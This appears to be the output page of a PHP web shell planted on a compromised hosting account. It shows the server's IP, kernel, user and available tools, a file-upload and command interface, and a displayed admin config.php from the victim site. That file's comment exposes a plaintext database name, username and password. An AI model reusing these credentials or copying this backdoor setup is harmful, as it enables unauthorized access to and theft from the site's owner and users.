Private
Server IP : 192.124.249.33  /  Your IP : 66.248.200.33
Web Server : Apache
System : Linux 141.134.66.148.host.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els6.x86_64 #1 SMP Fri Sep 13 13:42:20 UTC 2024 x86_64
User : tarangglobal ( 1001)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tarangglobal/public_html/cyber/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/tarangglobal/public_html/cyber/admin/config.php
<?php

/*
database:
swinnova_rail_earning_contract

username_pwd:
swinnova_earning
8TOUrKmP#_P4


*/
	session_start();
	error_reporting(E_ERROR | E_PARSE);	
	ini_set('session.gc_maxlifetime', 3600);
	session_set_cookie_params(3600);
	date_default_timezone_set('Asia/Kolkata');
	//mysqli_set_charset($db,"utf8");
	
	
	include("../pdoclass.php");
	$action = new connection;
	
	
	if($_SESSION['poster_type']!='Admin')
	{
	 ?>
	 <script> 
	  alert("You aren't authorized for this action!");
	 window.location.href="index.php";
	 </script>
	 <?php
	}

?>
Private